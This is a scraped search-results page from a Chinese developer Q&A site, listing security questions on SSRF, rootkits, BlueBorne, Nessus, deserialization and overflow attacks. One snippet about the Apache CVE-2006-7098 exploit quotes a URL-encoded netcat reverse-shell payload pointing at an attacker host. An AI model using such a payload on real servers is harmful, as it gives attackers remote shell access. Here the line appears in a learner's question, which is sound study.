腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
是SSRF
攻击
还是
漏洞
?
、
、
我现在正在阅读关于SSRF
攻击
的文章,很多文章都说"SSRF是一种
攻击
“,而其他人则说”这是一个
漏洞
“。哪个是对的?
浏览 0
提问于2019-02-02
得票数 2
3
回答
攻击
矢量,
攻击
面,
漏洞
,利用:区别在哪里?
、
我很难找出
攻击
矢量/
攻击
面/
漏洞
和利用之间的区别。根据维基百科(
漏洞
) 若要
攻击
漏洞
,
攻击
者必须至少有一个可用于连接到系统缺陷的工具或技术。在此框架中,
漏洞</em
浏览 0
提问于2015-06-04
得票数 25
回答已采纳
1
回答
哪些Linux内核
漏洞
允许安装内核级的rootkit?
、
、
我的问题与允许安装Linux内核级rootkit的
漏洞
有关(例如,修改内核内部的执行流;针对面向返回的
攻击
;或修改某些结构以隐藏某些进程)。在下面的站点中,我发现了迄今为止公开的Linux内核
漏洞
的一个很好的分类:当我注意到2011年没有(公开知道的)代码执行
漏洞
时,我感到有点惊讶。 这是否意味着不能利用该表中的其他
漏洞</e
浏览 0
提问于2011-12-05
得票数 16
2
回答
嵌入
式
Linux设备的Pentest
、
我试图发现的第一件事是使用戊四氮:程序是否在用户下运行(例如,在根用户下运行的程序不应该运行) 对于嵌入
式
Linux设备,是否有任何框架/工具可以用来发现上述两个方面的缺陷我正在努力发现基本的
漏洞
并修复这些
漏洞
。
浏览 0
提问于2017-07-06
得票数 0
回答已采纳
1
回答
攻击
者如何滥用分布
式
系统?
、
攻击
者如何利用一个使用状态是最终一致和矢量时钟来解决分歧的世界?有人知道利用分布
式
系统中的
漏洞
利用代码吗?
浏览 0
提问于2013-06-12
得票数 13
1
回答
漏洞
1:1有
漏洞
吗?
、
、
我要问的是,
攻击
是否被认为是利用特定
漏洞
,还是可以说多个
漏洞
利用了单个
漏洞
。例如,我们知道SQL通过SQL注入
攻击
有许多类型的
攻击
。我们是说SQL中通过发送意外命令来操作的
漏洞
本身就是
漏洞
,还是能够执行
攻击
操作的特定命令就是
漏洞
,这意味着它是1:1而不是1:*关系?
浏览 0
提问于2015-05-04
得票数 0
1
回答
模糊IDS规则
、
、
是否存在混淆IDS规则的已知技术,因此
攻击
者不能轻易地使用它们来反向设计他们检测到的
漏洞
? 让我提供一些背景情况。有时,IDS供应商会意识到零日
漏洞
(一个尚未公开披露的
漏洞
)。在这种情况下,人们可以制定一项规则来检测利用该
漏洞
并将其推给每个人,试图防止利用该
漏洞
.但这带来了新的风险。特别是,
攻击
者可能能够分析IDS规则并使用该规则获取一些线索,从而使
攻击
者更容易识别
漏洞
并开始使用该
漏洞
攻击
其他系统。
浏览 0
提问于2014-08-21
得票数 3
2
回答
在角2+中直接将url参数插入页面安全吗?
、
、
攻击
者绝对没有办法利用这一点吗?
浏览 0
提问于2017-08-03
得票数 0
回答已采纳
1
回答
如何保护Linux系统免受BlueBorne远程
攻击
?
、
、
、
、
Linux披露了基于Linux的BlueBorne
攻击
操作系统中的两个
漏洞
,这些
漏洞
允许
攻击
者完全控制受感染的设备。第一个
漏洞
是信息泄漏
漏洞
,它可以帮助
攻击
者确定目标设备使用的确切版本,并相应地调整他的
漏洞
。第二种是堆栈溢出,可以导致设备的完全控制。 例如,所有启用蓝牙的设备都应该被标记为恶意设备。此
攻击
不需要任何用户交互、身份验证或配对,使其几乎不可见。所有运行BlueZ的Linux设备都受到信息泄漏
漏洞
(CVE-
浏览 0
提问于2017-09-13
得票数 20
回答已采纳
2
回答
使用Nessus还是专注于手工测试?
、
Nessus扫描了很多
漏洞
,所以我应该集中学习Nessus没有涵盖的
漏洞
,比如目录遍历
攻击
吗?我应该只研究Nessus没有覆盖的
漏洞
,或者学习所有的
漏洞
,无论Nessus是否覆盖。这两个问题是: Nessus没有给出它可以找到的
漏洞
列表(它检查的所有
漏洞
,后来告诉我们它容易受到这些
漏洞
的
攻击
)。我们不知道Nessus的效率有多高(就像XSS
攻击
一样,OWASP上有大量的过滤器规避方法,我不知道Nessus涵盖了其中的
浏览 0
提问于2016-04-30
得票数 4
回答已采纳
1
回答
对DAO
攻击
的垃圾邮件反击是为了减缓
攻击
速度吗?
、
、
背景链接:您可以找到在DAO上安装递归调用
漏洞
攻击
涉及哪些帐户?中使用的帐户列表。您可以找到
攻击
发生在有任何方法可以确定DAO
攻击
者部署
攻击
所用的时间吗?中的时间段。 对DAO
攻击
的垃圾邮件反击是为了减缓
攻击
速度吗?
浏览 0
提问于2016-06-23
得票数 4
回答已采纳
2
回答
CVSS和链式
漏洞
、
假设一个网站有两个
漏洞
:反射XSS怎样才是最合适的方法来展示这些弱点?关于集思广益,我想说至少有三种选择:将这两个
漏洞
合并为一个具有很大影响的
漏洞
。 有三个
漏洞
,最初的两个加上两个链接时受影响的关键功能。第一个选项看起来不合适,第三个选项,列出一个额外的
漏洞
可能是多余的。第二个选项看起来不算太糟,但如果两个
漏洞</em
浏览 0
提问于2019-12-11
得票数 2
1
回答
什么时候可以使用CVE: 2006-7098的开发?
、
、
、
我正在研究Apache的旧版本1.3.34的
漏洞
。我也不太明白在什么情况下CVE2006-7098
漏洞
可以被利用。nc%20myhost%2031337%20-e%20%2fbin%2f/sh%0d编译了cgipwn
漏洞
并将其安装在
攻击
者计算机apache的cgipwn中。从
攻击
者机器执行nc命令,指定-p作
浏览 0
提问于2015-06-03
得票数 0
回答已采纳
2
回答
Java反序列化问题
、
我一直在阅读Java反序列化
漏洞
,该
漏洞
会导致远程代码执行
攻击
。许多公开的功绩甚至可以用来进行
攻击
。 我没有找到任何描述
攻击
者如何利用该
漏洞
的教程。
浏览 0
提问于2017-07-07
得票数 1
3
回答
驱动下行and与缓冲区和堆栈溢出
攻击
、
、
今天,恶意软件的传播主要得益于浏览器及其插件中的
漏洞
。
攻击
者使用JavaScript
攻击
这些
漏洞
。这类
攻击
的两个例子是按驱动下载、缓冲区和堆栈溢出
攻击
。这两次
攻击
有什么区别?
浏览 0
提问于2014-08-14
得票数 0
回答已采纳
1
回答
为什么谷歌状态2.0文档的OAuth没有提到“状态”参数?
即使在非隐
式
流中,防止CSRF
攻击
()似乎也是相当重要的。 我是不是遗漏了一些东西,表明state参数不是绝对必要的?似乎应该在文档中强调这一点,这样人们就不会留下CSRF
漏洞
。
浏览 0
提问于2015-11-20
得票数 3
1
回答
查找缓冲区溢出代码
漏洞
我正在利用这里中的一个
漏洞
。 利用
漏洞
可以很好地工作,但是我想找出导致
漏洞
的代码,它是RET覆盖基
攻击
,RET地址被覆盖到shell代码。我想知道易受
攻击
的函数epilog和prelog。
浏览 0
提问于2018-02-11
得票数 2
2
回答
jQuery 1.x易受“非显
式
数据类型跨站点脚本”的影响吗?
我们已经确定我们的项目易受JQuery跨站点脚本
漏洞
的影响。 为了缓解这个问题,我们建议将JQuery升级到3.0.0。 jQuery 1.x实际上不安全吗?
浏览 3
提问于2016-06-30
得票数 2
回答已采纳
2
回答
查找有关CVE-2006-6876
漏洞
的信息。
、
、
、
为了研究SIP服务器的
漏洞
以及DOS
攻击
对QoS of VoIP服务的影响,我发现此
漏洞
可以被利用在SIP服务器上引发DoS。
攻击
者如何可能造成溢出?OpenSER上可能发生的溢出
攻击
和拒绝服务
攻击
之间的关系是什么? 我不了解
攻击
者的描述和执行的操作。
浏览 0
提问于2012-06-22
得票数 0
回答已采纳
1
回答
发现
漏洞
与开发
漏洞
的成本
、
、
从希望针对某个软件应用程序或目标开发零天
攻击
的人的角度来看,
攻击
者必须执行以下两项任务:(1)在软件中发现新的可利用
漏洞
;(2)为该
漏洞
开发可靠的武器化
攻击
。例如,模糊分析、反向分析和静态分析可能有助于发现
漏洞
;但是,构建一个可靠的
漏洞
需要进行单独的分析和工作。 这两项任务中哪一项的平均成本更高?我想知道这两项任务的经济状况是什么,并了解成本的比例。我知道,如果您查看单个
漏洞
,代价将取决于
漏洞
,但我要问的是一般情况。例如,如果我们看一
浏览 0
提问于2016-03-23
得票数 6
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
WF曲速区告诫:警惕漏洞蠕虫式攻击的传播
上传漏洞攻击总结
网站漏洞修复方案防止SQL注入攻击漏洞
详解SQL注入式攻击
Web 安全漏洞之 XSS 攻击
热门
标签
更多标签
云服务器
ICP备案
云直播
对象存储
腾讯会议
活动推荐
运营活动
广告
关闭
领券